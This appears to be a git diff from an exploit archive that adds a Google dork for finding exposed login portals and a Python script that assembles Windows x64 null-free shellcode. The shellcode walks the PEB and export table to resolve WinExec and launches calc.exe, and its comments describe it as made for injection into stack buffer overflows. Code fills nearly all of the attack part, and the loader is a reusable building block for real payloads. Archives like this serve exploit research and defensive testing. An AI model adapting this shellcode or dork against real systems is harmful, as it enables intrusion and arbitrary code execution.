 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php
diff --git a/ghdb.xml b/ghdb.xml
index 7167200ff..a49abf4b2 100644
--- a/ghdb.xml
+++ b/ghdb.xml
@@ -87828,6 +87828,21 @@ Buenos Aires - Argentina
   <date>2021-02-16</date>
   <author>Javier Bernardo</author>
  </entry>
+ <entry>
+  <id>8219</id>
+  <link>https://www.exploit-db.com/ghdb/8219</link>
+  <category>Pages Containing Login Portals</category>
+  <shortDescription>inurl:uux.aspx</shortDescription>
+  <textualDescription># Google Dork: inurl:uux.aspx
+# Pages Containing Login Portals
+# Date: 28/07/2023
+# Exploit Author: Javier Bernardo</textualDescription>
+  <query>inurl:uux.aspx</query>
+  <querystring>https://www.google.com/search?q=inurl:uux.aspx</querystring>
+  <edb></edb>
+  <date>2023-07-28</date>
+  <author>Javier Bernardo</author>
+ </entry>
  <entry>
   <id>6562</id>
   <link>https://www.exploit-db.com/ghdb/6562</link>
diff --git a/shellcodes/windows/51634.py b/shellcodes/windows/51634.py
new file mode 100755
index 000000000..39e719666
--- /dev/null
+++ b/shellcodes/windows/51634.py
@@ -0,0 +1,128 @@
+import ctypes, struct
+from keystone import *
+
+
+# Shellcode Author: Senzee
+# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
+# Date: 07/26/2023
+# Platform: Windows x64
+# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
+# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763
+# Shellcode size: 169 bytes
+# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.
+# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
+
+
+CODE = (
+"find_kernel32:"
+" xor rdx, rdx;"
+" mov rax, gs:[rdx+0x60];"    # RAX stores  the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
+" mov rsi,[rax+0x18];"    # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
+" mov rsi,[rsi + 0x20];"    # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure
+" mov r9, [rsi];"    # Current module is python.exe
+" mov r9, [r9];"    # Current module is ntdll.dll
+" mov r9, [r9+0x20];"    # Current module is kernel32.dll
+" jmp call_winexec;"
+
+"parse_module:" # Parsing DLL file in memory
+" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores  the base address of the module, get the NT header offset
+" xor r15, r15;"
+" mov r15b, 0x88;"    # Offset to Export Directory
+" add r15, r9;"
+" add r15, rcx;"
+" mov r15d, dword ptr [r15];"    # Get the RVA of the export directory
+" add r15, r9;"    # R14 stores  the VMA of the export directory
+" mov ecx, dword ptr [r15 + 0x18];"    # ECX stores  the number of function names as an index value
+" mov r14d, dword ptr [r15 + 0x20];"    # Get the RVA of ENPT
+" add r14, r9;"    # R14 stores  the VMA of ENPT
+
+"search_function:"    # Search for a given function
+" jrcxz not_found;"    # If RCX is 0, the given function is not found
+" dec ecx;"    # Decrease index by 1
+" xor rsi, rsi;"
+" mov esi, [r14 + rcx*4];"    # RVA of function name string
+" add rsi, r9;"    # RSI points to function name string
+
+"function_hashing:"    # Hash function name function
+" xor rax, rax;"
+" xor rdx, rdx;"
+" cld;"    # Clear DF flag
+
+"iteration:"     # Iterate over each byte
+" lodsb;"     # Copy the next byte of RSI to Al
+" test al, al;"     # If reaching the end of the string
+" jz compare_hash;"     # Compare hash
+" ror edx, 0x0d;"     # Part of hash algorithm
+" add edx, eax;"     # Part of hash algorithm
+" jmp iteration;"     # Next byte
+
+"compare_hash:"     # Compare hash
+" cmp edx, r8d;"
+" jnz search_function;"     # If not equal, search the previous function (index decreases)
+" mov r10d, [r15 + 0x24];"     # Ordinal table RVA
+" add r10, r9;"     # Ordinal table VMA
+" movzx ecx, word ptr [r10 + 2*rcx];"     # Ordinal value -1
+" mov r11d, [r15 + 0x1c];"    # RVA of EAT
+" add r11, r9;"    # VMA of EAT
+" mov eax, [r11 + 4*rcx];"    # RAX stores  RVA of the function
+" add rax, r9;"    # RAX stores  VMA of the function
+" ret;"
+"not_found:"
+" ret;"
+
+
+"call_winexec:"
+"    mov r8d, 0xe8afe98;"     # WinExec Hash
+"    call parse_module;"     # Search and obtain address of WinExec
+"    xor rcx, rcx;"
+"    push rcx;"    # \0
+"    mov rcx, 0x6578652e636c6163;"	  # exe.clac
+"    push rcx;"
+"    lea rcx, [rsp];"    # Address of the string as the 1st argument lpCmdLine
+"    xor rdx,rdx;"
+"    inc rdx;"    # uCmdShow=1 as the 2nd argument
+"    sub rsp, 0x28;"
+"    call rax;"     # WinExec
+
+)
+
+
+# Payload size: 169 bytes
+# buf =  b"\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x20\x4c\x8b\x0e\x4d"
+# buf += b"\x8b\x09\x4d\x8b\x49\x20\xeb\x63\x41\x8b\x49\x3c\x4d\x31\xff\x41\xb7\x88\x4d\x01"
+# buf += b"\xcf\x49\x01\xcf\x45\x8b\x3f\x4d\x01\xcf\x41\x8b\x4f\x18\x45\x8b\x77\x20\x4d\x01"
+# buf += b"\xce\xe3\x3f\xff\xc9\x48\x31\xf6\x41\x8b\x34\x8e\x4c\x01\xce\x48\x31\xc0\x48\x31"
+# buf += b"\xd2\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x44\x39\xc2\x75\xda\x45"
+# buf += b"\x8b\x57\x24\x4d\x01\xca\x41\x0f\xb7\x0c\x4a\x45\x8b\x5f\x1c\x4d\x01\xcb\x41\x8b"
+# buf += b"\x04\x8b\x4c\x01\xc8\xc3\xc3\x41\xb8\x98\xfe\x8a\x0e\xe8\x92\xff\xff\xff\x48\x31"
+# buf += b"\xc9\x51\x48\xb9\x63\x61\x6c\x63\x2e\x65\x78\x65\x51\x48\x8d\x0c\x24\x48\x31\xd2"
+# buf += b"\x48\xff\xc2\x48\x83\xec\x28\xff\xd0"
+
+
+
+
+ks = Ks(KS_ARCH_X86, KS_MODE_64)
+encoding, count = ks.asm(CODE)
+print("%d instructions..." % count)
+
+sh = b""
+for e in encoding:
+    sh += struct.pack("B", e)
+shellcode = bytearray(sh)
+sc = ""
+print("Payload size: "+str(len(encoding))+" bytes")
+
+
+counter = 0
+sc = "buf =  b\""
+for dec in encoding:
+    if counter % 20 == 0 and counter != 0:
+        sc += "\"\nbuf += b\""
+    sc += "\\x{0:02x}".format(int(dec))
+    counter += 1
+
+if count % 20 > 0:
+	sc += "\""
+print(sc)
+
+print("Payload size: "+str(len(encoding))+" bytes")
\ No newline at end of file